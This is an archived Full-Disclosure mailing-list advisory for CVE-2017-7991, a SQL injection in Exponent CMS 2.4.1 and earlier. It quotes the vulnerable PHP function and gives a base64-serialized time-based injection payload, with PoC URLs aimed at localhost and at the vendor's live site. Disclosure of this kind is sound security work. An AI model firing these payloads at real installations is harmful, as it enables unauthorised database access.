| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 21 Apr 2017 14:14:38 +0800
From: "404 Not Found" <root@...notfound.org>
To: "fulldisclosure" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2017-7991-SQL injection-Exponent CMS
CVE-2017-7991-SQL injection-Exponent CMS
[Suggested description]
> Exponent CMS 2.4.1 and earlier has SQL injection via a base64
> serialized API key (apikey parameter) in the api function of
> framework/modules/eaas/controllers/eaasController.php.
>
> ------------------------------------------
>
> [Additional Information]
> Vulnerable file is: /framework/modules/eaas/controllers/eaasController.php
> Vulnerable function is api.
>
> public function api() {
> if (empty($this->params['apikey'])) {
> $_REQUEST['apikey'] = true; // set this to force an ajax reply
> $ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null);
> $ar->send(); //FIXME this doesn't seem to work correctly in this scenario
> } else {
> echo $this->params['apikey'];
> $key = expUnserialize(base64_decode(urldecode($this->params['apikey'])));
> echo $key;
>
> $cfg = new expConfig($key);
> $this->config = $cfg->config;
> if(empty($cfg->id)) {
> $ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null);
> $ar->send();
> } else {
> if (!empty($this->params['get'])) {
> $this->handleRequest();
> } else {
> $ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null);
> $ar->send();
> }
> }
> }
> }
>
> We can control param $apikey by using base64_encode and serialize
> functions to encrypt the SQL injection string. Then, the $apikey will
> be decrypted and cause SQL injection. Such as, if we want to use
> "aaa\'or sleep(2)#" to inject, we should use "echo
> base64_encode(serialize($apikey));" to encrypt the Attack string:
> czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the result. So,
> http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
> is the PoC. The result is: the site will sleep several seconds, and
> you can see SQL injection is successful in MySQL logs.
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Exponent CMS
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Exponent CMS - 2.4.1 and earlier
>
> ------------------------------------------
>
> [Affected Component]
> \framework\modules\eaas\controllers\eaasController.php,function api(),param $apikey
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
>
> http://www.exponentcms.org/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
>
> ------------------------------------------
>
> [Discoverer]
> 404notfound
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists